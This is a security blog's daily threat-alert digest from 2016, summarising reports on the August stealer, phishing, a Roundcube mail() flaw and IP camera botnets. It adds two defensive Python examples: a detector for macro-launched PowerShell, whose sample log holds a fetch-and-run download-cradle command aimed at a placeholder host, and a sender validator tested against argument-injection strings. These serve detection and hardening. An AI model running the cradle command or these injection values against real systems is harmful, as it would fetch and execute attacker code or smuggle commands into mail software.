Gotham Security Daily Threat Alerts

By Nancy Rand
Posted in Security
On December 09, 2016

December 8, SecurityWeek – (International) August stealer uses PowerShell for fileless infection. Proofpoint security researchers warned that a new information-stealing malware, dubbed August, leverages Microsoft Word documents containing malicious macros which, once enabled, launch a PowerShell command to download and install the August stealer on a machine for a fileless infection. The malicious payload is downloaded from a remote site as a PowerShell byte array, and the campaign targets customer service and managerial staff at retail stores to steal credentials and sensitive documents from the affected devices. Source
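The infection chain described above (Word macro spawns PowerShell, which fetches its payload from a remote site) leaves a process-creation trail that endpoint telemetry can catch even when nothing is written to disk. The following detection routine is an added example, not code from Proofpoint or from the report; it runs over a few constructed Sysmon-style process-creation lines (not real telemetry) and flags a script host spawned by an Office application, scoring higher when the command line also carries a download-cradle marker.

```python
import re

# Constructed sample process-creation events in a Sysmon-like key=value layout.
# These are illustrative inputs only, not captured telemetry.
SAMPLE_EVENTS = [
    "UtcTime=2016-12-08 10:01:02 "
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "ParentImage=C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE "
    "CommandLine=powershell.exe -NoP -W Hidden -c IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage')",
    "UtcTime=2016-12-08 10:05:00 "
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "ParentImage=C:\\Windows\\explorer.exe "
    "CommandLine=powershell.exe -File C:\\scripts\\inventory.ps1",
    "UtcTime=2016-12-08 10:07:30 "
    "Image=C:\\Windows\\System32\\notepad.exe "
    "ParentImage=C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE "
    "CommandLine=notepad.exe",
]

# CommandLine is parsed last as the remainder so that spaces inside it do not
# confuse the key=value split.
EVENT_RE = re.compile(
    r"UtcTime=(?P<time>\S+ \S+) Image=(?P<image>.+?) "
    r"ParentImage=(?P<parent>.+?) CommandLine=(?P<cmdline>.*)$"
)

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
# Substrings commonly seen in PowerShell download cradles (case-insensitive).
CRADLE_MARKERS = (
    "net.webclient", "downloadstring", "downloadfile",
    "invoke-expression", "iex ", "frombase64string", "-enc",
)


def parse_event(line):
    """Return a dict with time/image/parent/cmdline, or None if the line does not match."""
    m = EVENT_RE.match(line)
    return m.groupdict() if m else None


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def analyze(event):
    """Return a list of reasons this event looks like a macro-launched script host."""
    reasons = []
    if basename(event["parent"]) in OFFICE_PARENTS and basename(event["image"]) in SCRIPT_HOSTS:
        reasons.append("script host spawned by Office application")
        cmd = event["cmdline"].lower()
        hits = [m for m in CRADLE_MARKERS if m in cmd]
        if hits:
            reasons.append("download cradle markers: " + ", ".join(sorted(hits)))
    return reasons


def detect(lines):
    """Run the rule over raw log lines and return one alert dict per suspicious event."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if not ev:
            continue
        reasons = analyze(ev)
        if reasons:
            alerts.append({"time": ev["time"], "parent": basename(ev["parent"]),
                           "image": basename(ev["image"]), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["time"], alert["parent"], "->", alert["image"])
        for r in alert["reasons"]:
            print("   ", r)
```

The rule deliberately keys on the parent/child relationship first and treats the cradle strings as corroboration: an Office process launching PowerShell is rare enough in most fleets to be worth a look on its own, while the marker list alone would miss obfuscated variants. Anchor the same logic on Windows Security event 4688 with command-line auditing enabled if Sysmon is not deployed.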

December 8, Help Net Security – (International) 323,000 pieces of malware detected daily. Kaspersky Lab reported that the number of new malware files detected by its products increased to 323,000 per day in 2016, an increase of 13,000 over the number of files detected per day in 2015. Source

December 7, Help Net Security – (International) Over 400,000 phishing sites have been observed each month during 2016. Webroot security researchers reported that phishing Websites have become more sophisticated and carefully crafted: 84 percent of phishing sites observed in 2016 existed for less than 24 hours, leaving any organization or person susceptible to having sensitive information stolen before the site can be blocked. Webroot also found that during 2016 an average of more than 400,000 phishing Websites were observed each month, and that nearly all of the phishing URLs were hidden within otherwise benign domains, among other findings. Source

December 7, SecurityWeek – (International) Hackers can exploit Roundcube flaw by sending an email. RIPS Technologies discovered that Roundcube, an open source Webmail application, was plagued by a critical vulnerability related to the PHP (Hypertext Preprocessor) function “mail()” that an attacker with access to the targeted system can exploit to execute arbitrary commands on the system by sending an email. The security firm found that user input is not properly sanitized before reaching the fifth parameter of the “mail()” function, which allows an attacker to pass arbitrary arguments to the mail transfer agent and create a malicious PHP file in the system’s Web root directory, enabling the malicious actor to execute commands and conduct malicious activities. Source
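The fifth parameter of PHP's mail() is handed to the local sendmail binary as extra command-line arguments; PHP runs it through escapeshellcmd(), which stops command chaining but not space-separated additional arguments, so any user-controlled value placed there (a sender address for “-f”, for instance) needs strict validation of its own. The following is an added example, not Roundcube's code, showing that check in Python: a conservative address syntax, an explicit rejection of a leading dash, and construction of the sendmail argument list only after the value passes. The sendmail path is an assumption for illustration.

```python
import re

# Conservative address syntax: one local part, one domain, no whitespace or shell metacharacters.
# Deliberately narrower than RFC 5322; anything unusual is refused rather than guessed at.
ADDRESS_RE = re.compile(r"^[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+$")

SENDMAIL = "/usr/sbin/sendmail"  # assumed path, for illustration only


def is_safe_sender(addr):
    """True only if addr is a plain address that cannot be read as an option or extra argument.

    The leading-dash check is separate from the regex on purpose: '-' is a legal
    character in a local part, so "-x@example.com" would otherwise pass and be
    parsed by sendmail as an option rather than an address.
    """
    if not isinstance(addr, str) or not addr:
        return False
    if addr.startswith("-"):
        return False
    if any(ch.isspace() for ch in addr):
        return False
    return ADDRESS_RE.match(addr) is not None


def build_sendmail_argv(from_addr):
    """Return the argument vector a mailer would run for an envelope sender, or raise ValueError.

    This is the list form (no shell), and "-f" is given as its own element; both
    help, but neither would stop a value that is itself an option, which is why
    is_safe_sender() is mandatory first.
    """
    if not is_safe_sender(from_addr):
        raise ValueError("refusing unsafe envelope sender: %r" % (from_addr,))
    return [SENDMAIL, "-t", "-i", "-f", from_addr]


def classify(candidates):
    """Split constructed candidate inputs into accepted and rejected lists (for demonstration)."""
    accepted, rejected = [], []
    for c in candidates:
        (accepted if is_safe_sender(c) else rejected).append(c)
    return accepted, rejected


if __name__ == "__main__":
    # Constructed inputs: one ordinary address and three shapes an injection attempt takes.
    samples = [
        "user@example.com",
        "-x@example.com",                      # option-looking local part
        "user@example.com -extra-argument",    # space-separated extra argument
        "user@example.com;id",                 # shell metacharacter
    ]
    ok, bad = classify(samples)
    print("accepted:", ok)
    print("rejected:", bad)
    print(build_sendmail_argv(ok[0]))
```

Whitelisting the value is the right shape of fix here: escaping functions answer the question “can this break out of the command?” while the flaw in the report is “can this be read as another argument to the same command?”, and only a syntax check on the value answers the second.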

December 7, SecurityWeek – (International) Hundreds of thousands of IP cameras exposed to IoT botnets. Cybereason security researchers reported that two zero-day flaws, including a combined authentication bypass and information disclosure bug, affect hundreds of thousands of Internet Protocol (IP) cameras worldwide, making them susceptible to malware compromise and, subsequently, to being ensnared into Internet of Things (IoT) botnets. An attacker can leverage the vulnerabilities to move the camera and see the images it is sending, as well as to execute malicious code and find other cameras plagued by the same vulnerabilities. Source

Above Reprinted from the USDHS Daily Open Source Infrastructure Report

Nancy Rand

Nancy has more than 20 years’ experience in information technology and security, solving business issues and implementing best-practice solutions that support organizational objectives. Her expertise includes leveraging, optimizing, and implementing diverse technology platforms, and management of large-scale technology projects.